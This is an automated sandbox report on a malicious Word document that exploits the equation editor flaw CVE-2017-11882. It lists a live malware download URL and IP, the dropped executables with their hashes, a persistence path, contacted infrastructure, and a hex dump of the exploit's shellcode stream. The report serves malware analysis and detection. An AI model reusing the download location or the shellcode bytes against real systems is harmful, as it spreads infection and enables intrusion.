Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IMG_05412_868_21.docx	30%	Virustotal		Browse
IMG_05412_868_21.docx	38%	ReversingLabs	Document.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe	40%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\AppData\Local\Temp\tthxx.exe	40%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe	40%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\tthxx.exe	40%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
11.2.tthxx.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1138720		Download File
4.2.tthxx.exe.338f020.4.unpack	100%	Avira	HEUR/AGEN.1110362		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://discord.com/2	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/6	0%	Avira URL Cloud	safe
http://31.210.20.6/3/44444.exe	7%	Virustotal		Browse
http://31.210.20.6/3/44444.exe	100%	Avira URL Cloud	malware
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://mNVnNH.com	0%	Avira URL Cloud	safe
https://discord.com/:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://31.210.20.6/3/44444.exe	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.org%GETMozilla/5.0	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://discord.com/2	tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNS	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://discord.com/	tthxx.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp	false		high
https://discord.com/6	tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000004.00000002.2242103851.0000000000C63000.00000004.00000020.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mNVnNH.com	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/:	tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.210.20.6	unknown	Netherlands		61157	PLUSSERVER-ASN1DE	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404303
Start date:	04.05.2021
Start time:	22:00:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	IMG_05412_868_21.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOCX@12/11@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 62.5% Quality standard deviation: 14.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 156 Number of non-executed functions: 10
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .docx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:01:57	API Interceptor	84x Sleep call for process: EQNEDT32.EXE modified
22:01:59	API Interceptor	897x Sleep call for process: tthxx.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
31.210.20.6	PL_503_13_570.docx	Get hash	malicious	Browse	31.210.20.6/3/Sugvt.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PLUSSERVER-ASN1DE	PL_503_13_570.docx	Get hash	malicious	Browse	31.210.20.6
	mzJ8O3L58V.exe	Get hash	malicious	Browse	31.210.20.238
	vwr 30.04.2021.pdf.exe	Get hash	malicious	Browse	31.210.21.236
	VWR CI 290421.xlsx.exe	Get hash	malicious	Browse	31.210.21.236
	it54qPllN4.exe	Get hash	malicious	Browse	31.210.21.71
	FPI_874101020075.xlsx	Get hash	malicious	Browse	31.210.21.71
	mzJ8O3L58V.exe	Get hash	malicious	Browse	31.210.20.238
	RFQ 00234567828723635387632988822.jar	Get hash	malicious	Browse	31.210.21.99
	ORDER I_5130_745_618.xlsx	Get hash	malicious	Browse	31.210.21.231
	RFQ 00234567828723635387632988822.jar	Get hash	malicious	Browse	31.210.21.99
	6381ca8d_by_Libranalysis.xlsx	Get hash	malicious	Browse	31.210.20.238
	Annexure A-61322.jar	Get hash	malicious	Browse	31.210.21.99
	PLI5130745618.exe	Get hash	malicious	Browse	31.210.21.231
	EPC Works for AMAALA AIRFIELD PROJECT - WORK .jar	Get hash	malicious	Browse	31.210.21.99
	ShippingDocuments.exe	Get hash	malicious	Browse	31.210.21.236
	purchase order confirmation.exe	Get hash	malicious	Browse	31.210.21.181
	purchase order acknowledgement.exe	Get hash	malicious	Browse	31.210.21.181
	TBBurmah Trading Co., Ltd - products inquiry .exe	Get hash	malicious	Browse	31.210.21.181
	RFQ #ER428-BD.exe	Get hash	malicious	Browse	31.210.21.203
	PaymentAdvice.exe	Get hash	malicious	Browse	31.210.20.71

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	343352
Entropy (8bit):	7.841371992370745
Encrypted:	false
SSDEEP:	6144:FL4Qez8X+5KBrIxuNWUwJm4OdB17ZDs0s7xHAVkYifH4TWcwb8tFHQK:V4Qez+YSSjUAmdr17Zw0+geYqH41wb88
MD5:	CCE6C363C0FF7AC663CD71C5906069A6
SHA1:	98AD5E24BF99FBB4CF7BDCAA54B6D720064DC810
SHA-256:	B65EED317058DF5DDD4247EC93AC2B555AE2C29B751EE455CEEE3DD9B670ECAD
SHA-512:	C3E28465D1FB8673D4B203D3A985AF370255E1381EA8D9DB910F213EFFC4F5C3CA0214497FA783396A25C4316D5CDDE6F05A35BBF44581EF5BC4C2FCD4F8FA1B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Reputation:	low
IE Cache URL:	http://31.210.20.6/3/44444.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..`.....................J......^.... ........@.. ....................................@.....................................K.......,G..............8....`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...,G.......H..................@..@.reloc.......`......................@..B................@.......H........J..$,...........w...y...........................................0...........:.........(/...8....&.....(...........s....o.... .>n.(5....:6...& .>n.(5.........%.(-.....:!...&& a>n.(5...('...&8....((...8....(...8.....................0..........(.........(....o.... ^>n.(5...(....o.....:....&8.....8....s.....:....&..o.....o....s.....9....&8.....8.....8....s.......s....s.........o...........o......o............o...........o.....(......o............9.....o.......*.4......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E92F7FC7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 288 x 424, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84949
Entropy (8bit):	7.992825260372582
Encrypted:	true
SSDEEP:	1536:JPs/c63J2lk4Gjh3mkGaWqOJcJ8BsjTxfNbQ2ds7WQGBJeDSl:JPMtIlkdjh2kJWgjpf1b/eDI
MD5:	23A2AF973BBF6CC30633EB218EF11067
SHA1:	69E4BB8450F096694A026CA859498AE30D3FB1FB
SHA-256:	1AD903E11D4A00E9AF3A24E5F92A71295A693945CC3BBF894D6176BA831445C4
SHA-512:	85376D9C5A4B688E781938F11AE3CBB592F86C4593B7BCC8E74EE32ECEB0FF374A17B5DFFD8E3ECA0498420AB07F04A75423992416B33BE59EA35836671BB838
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR... ..........`85.. .IDATx....8.%FR.. @....y..&...D.eU.HI..{..q..D...b.o..t+.Rs.c..._M-(...~'...o...O6}..\|..s...._.g...md.Z...cJ...uI9.TJ..r..%.9..s.....'~...^...........o...w...r....3..e..m...~.R.w..{....ui.E~iS^}.......}.x.N.......I.....?o.;j...x..G....FcW....Wr...op-....z.+..............?........+M..3...j.....%..9......Q......)...o....?3...-...tV.F....m.I.@.t...&.}.....w....>...p..........F...!,..&k....y.,ky.@O.B..BZmI..Z...9...A....>. d..\|f.a...yh^....?...?......2...........@.g\z.K....4~_.Os.....gC.oT.C.Y...Ab..p?w......Z...~Z...\|.H>M9x..}.b.~..?.......`q....2?,....0..@.....k..\|F..@....{.t...=.N..R"I).w/.5Ox..g...E)b.,f....).a..+..].^. ...ic+.2%O..d..M...l;.D).......W...H.nL.....-....m..C.......!U..{2.f?.f..A..("....).:.G>..U.....DD.\|w.wi.oR...jG.......@,..e6..K{.t.0...#j.&../..j.....:..t/...}..x....K.#1K.'3h.A.a....\|~.P.n.3.......OF......O.'.4.+.....kK....=T*.~.Y..0.i2.,..2`B.w.q..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3E742551-7EEA-4C35-A601-2DE7AC9E238F}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - RLE 65536 x 65536 x 0 ""
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	0.3471815213908766
Encrypted:	false
SSDEEP:	3:ylYdltn/lL6VVg7Na0clWQaK/llltlNl/ma/ldzNBBllqPxZlhQtChj:13MVKpalYQaK/cqz0PxZUta
MD5:	B03078EFAA0090390ABB3DBCB03888E1
SHA1:	8EB8C69A8DEC6BF967365685C62FFF03B4E4EF34
SHA-256:	5DA54FED2B54DE4A701FDC6BEC06670C6836C02F01EC9ABCD83786237D12A3D5
SHA-512:	B3984B543B95746E9029337A5BFA0A9BD40F4322BE49E1581CC4136464A59EF7CAFAC2C1EA87526E3BFF8AD0170AE1235FC184399D9FBD222725712355B9E9BD
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABA8B27-B28F-4AE5-86AD-026C320EA73C}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tthxx.exe Download File
Process:	C:\Users\user\tthxx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	343352
Entropy (8bit):	7.841371992370745
Encrypted:	false
SSDEEP:	6144:FL4Qez8X+5KBrIxuNWUwJm4OdB17ZDs0s7xHAVkYifH4TWcwb8tFHQK:V4Qez+YSSjUAmdr17Zw0+geYqH41wb88
MD5:	CCE6C363C0FF7AC663CD71C5906069A6
SHA1:	98AD5E24BF99FBB4CF7BDCAA54B6D720064DC810
SHA-256:	B65EED317058DF5DDD4247EC93AC2B555AE2C29B751EE455CEEE3DD9B670ECAD
SHA-512:	C3E28465D1FB8673D4B203D3A985AF370255E1381EA8D9DB910F213EFFC4F5C3CA0214497FA783396A25C4316D5CDDE6F05A35BBF44581EF5BC4C2FCD4F8FA1B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..`.....................J......^.... ........@.. ....................................@.....................................K.......,G..............8....`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...,G.......H..................@..@.reloc.......`......................@..B................@.......H........J..$,...........w...y...........................................0...........:.........(/...8....&.....(...........s....o.... .>n.(5....:6...& .>n.(5.........%.(-.....:!...&& a>n.(5...('...&8....((...8....(...8.....................0..........(.........(....o.... ^>n.(5...(....o.....:....&8.....8....s.....:....&..o.....o....s.....9....&8.....8.....8....s.......s....s.........o...........o......o............o...........o.....(......o............9.....o.......*.4......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IMG_05412_868_21.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed Aug 26 14:08:18 2020, atime=Wed May 5 04:01:37 2021, length=96379, window=hide
Category:	dropped
Size (bytes):	2098
Entropy (8bit):	4.54273536544135
Encrypted:	false
SSDEEP:	24:8Q624k/XTm6GreVb4rejVlMcDv3qSndM7dD2Q624k/XTm6GreVb4rejVlMcDv3ql:8W/XTFGqMUEWQh2W/XTFGqMUEWQ/
MD5:	15A833EC52FD4FC187123BEACB704EF0
SHA1:	E7E7C471674FFECA9687448EC3E4DB5B21CEB6D6
SHA-256:	CD4FC7A6BE04C0DB2F1B85C99B9391C212641169CA78C88719E32AE83C1C8DC7
SHA-512:	C353A6DC51A04443FC2DEC6324DAE2BB29E6CB127888D9E02D6F33BAEF1334EFB09A08A5204D358DDA8F071744B493395C1EDFD7F0CDA182941C8A3E31039E5E
Malicious:	false
Preview:	L..................F.... ...C...{..C...{....G.kA..{x...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2.{x...R3( .IMG_05~1.DOC..X.......Q.y.Q.y...8.....................I.M.G._.0.5.4.1.2._.8.6.8._.2.1...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\IMG_05412_868_21.docx.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.M.G._.0.5.4.1.2._.8.6.8._.2.1...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9F.C

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.4356649311036564
Encrypted:	false
SSDEEP:	3:HnySdTfpS0zdTfpSmxWnySdTfpSv:Hnzdj7djkzdjC
MD5:	9C48449D50548F63F4EB2D8F20F4E772
SHA1:	2F955196DEC8A57E2E5DC87168430ED6F1E19ECE
SHA-256:	DC8F78A041AA54A472E3BBDE699F3E8EB86A322E738D9FF76C55FCD41B3D9FAC
SHA-512:	8210427CE9E37E625097386901F61AF026CDDF440300D197E5105BACD7D49BEACC22C7DCAE5E9F785157C4D4251E4B378D24DC9DAC268DA1D61ABBAF2CF0139A
Malicious:	false
Preview:	[misc]..IMG_05412_868_21.LNK=0..IMG_05412_868_21.LNK=0..[misc]..IMG_05412_868_21.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe Download File
Process:	C:\Users\user\tthxx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	343352
Entropy (8bit):	7.841371992370745
Encrypted:	false
SSDEEP:	6144:FL4Qez8X+5KBrIxuNWUwJm4OdB17ZDs0s7xHAVkYifH4TWcwb8tFHQK:V4Qez+YSSjUAmdr17Zw0+geYqH41wb88
MD5:	CCE6C363C0FF7AC663CD71C5906069A6
SHA1:	98AD5E24BF99FBB4CF7BDCAA54B6D720064DC810
SHA-256:	B65EED317058DF5DDD4247EC93AC2B555AE2C29B751EE455CEEE3DD9B670ECAD
SHA-512:	C3E28465D1FB8673D4B203D3A985AF370255E1381EA8D9DB910F213EFFC4F5C3CA0214497FA783396A25C4316D5CDDE6F05A35BBF44581EF5BC4C2FCD4F8FA1B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..`.....................J......^.... ........@.. ....................................@.....................................K.......,G..............8....`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...,G.......H..................@..@.reloc.......`......................@..B................@.......H........J..$,...........w...y...........................................0...........:.........(/...8....&.....(...........s....o.... .>n.(5....:6...& .>n.(5.........%.(-.....:!...&& a>n.(5...('...&8....((...8....(...8.....................0..........(.........(....o.... ^>n.(5...(....o.....:....&8.....8....s.....:....&..o.....o....s.....9....&8.....8.....8....s.......s....s.........o...........o......o............o...........o.....(......o............9.....o.......*.4......

C:\Users\user\Desktop\~$G_05412_868_21.docx Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\tthxx.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	343352
Entropy (8bit):	7.841371992370745
Encrypted:	false
SSDEEP:	6144:FL4Qez8X+5KBrIxuNWUwJm4OdB17ZDs0s7xHAVkYifH4TWcwb8tFHQK:V4Qez+YSSjUAmdr17Zw0+geYqH41wb88
MD5:	CCE6C363C0FF7AC663CD71C5906069A6
SHA1:	98AD5E24BF99FBB4CF7BDCAA54B6D720064DC810
SHA-256:	B65EED317058DF5DDD4247EC93AC2B555AE2C29B751EE455CEEE3DD9B670ECAD
SHA-512:	C3E28465D1FB8673D4B203D3A985AF370255E1381EA8D9DB910F213EFFC4F5C3CA0214497FA783396A25C4316D5CDDE6F05A35BBF44581EF5BC4C2FCD4F8FA1B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..`.....................J......^.... ........@.. ....................................@.....................................K.......,G..............8....`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...,G.......H..................@..@.reloc.......`......................@..B................@.......H........J..$,...........w...y...........................................0...........:.........(/...8....&.....(...........s....o.... .>n.(5....:6...& .>n.(5.........%.(-.....:!...&& a>n.(5...('...&8....((...8....(...8.....................0..........(.........(....o.... ^>n.(5...(....o.....:....&8.....8....s.....:....&..o.....o....s.....9....&8.....8.....8....s.......s....s.........o...........o......o............o...........o.....(......o............9.....o.......*.4......

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	7.990365980812427
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	IMG_05412_868_21.docx
File size:	96379
MD5:	8832e0557e1b144bad206ed6d14d5c34
SHA1:	4b729d3262362a2ab3edab09ac1f625af8f5e0c1
SHA256:	fbd1b454da7fecb92c40b9b2f74fc8fecae79340afdc011e7c0d6339fabdcfde
SHA512:	568c6f935ae270f464ee79e53a5b0df62788bf9783de01b6f64d95c4f0845851849be8002f6bdc5b30f89ffd4cb06cc7ba3ca81907e9529d59b02363fb11f140
SSDEEP:	1536:zf0WCyPs/c63J2lk4Gjh3mkGaWIpOJcJ8BsjTxfNbQxds7WQGBJeDSD:zfpCyPMtIlkdjh2kJWgjpfmb/eDI
File Content Preview:	PK........l..R....z...0.......[Content_Types].xmlUT...:..`:..`:..`.T.n.0..W.?D."b........T...=...d...;.4.....%.=....o0Zk.-..iMA.y.d`......1}.>.,Df.S.@A6..hx{3.n....&.d..{.4.9h.r..`..^..G?.../6.z...SnM...1q.....P1{Y......H..mLZ.a.).Y.:].....)...{.\....B.

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/404303/sample/IMG_05412_868_21.docx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Title:
Subject:
Author:	Dell
Keywords:
Template:	Normal.dotm
Last Saved By:	Dell
Revion Number:	1
Total Edit Time:	1
Create Time:	2021-04-28T13:50:00Z
Last Saved Time:	2021-04-28T13:51:00Z
Number of Pages:	1
Number of Words:	0
Number of Characters:	0
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Number of Lines:	0
Number of Paragraphs:	0
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	15.0000

Streams

Stream Path: \x1oLE10naTiVE, File Type: data, Stream Size: 1420

General
Stream Path:	\x1oLE10naTiVE
File Type:	data
Stream Size:	1420
Entropy:	7.59554617701
Base64 Encoded:	False
Data ASCII:	= o . . . ~ . . G . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . D . . . . . . . . . ^ . . . b . . . . . . . . . . . . . P . . . . . 1 . . n . . . . 4 . . - . $ . i S . U . . . { . . . 9 . G . . I . Q . . . ' . . . . . G . . . P R Z V . . . . I . . . . . H . . . . { . . . ^ X . Y . . . . 7 k . . . . . . . . . . . . T . . . . . . . . . i . k c . & . . . . . . . . . \\ . . . . u ` l . . . . . g . . . . . . S P S . . . $ . . .
Data Raw:	3d 6f fb 04 03 7e 01 eb 47 0a 01 05 37 89 85 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e8 00 00 00 00 5e eb 02 eb 62 81 c6 a8 02 00 00 8d 8e 8f 02 00 00 eb 50 e9 d2 00 00 00 31 06 eb 6e 90 eb 07 13 34 ee d6 2d a4 24 05 69 53 8c 55

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/04/21-22:01:56.453454	TCP	2022566	ET TROJAN Possible Malicious Macro EXE DL AlphaNumL	49167	80	192.168.2.22	31.210.20.6
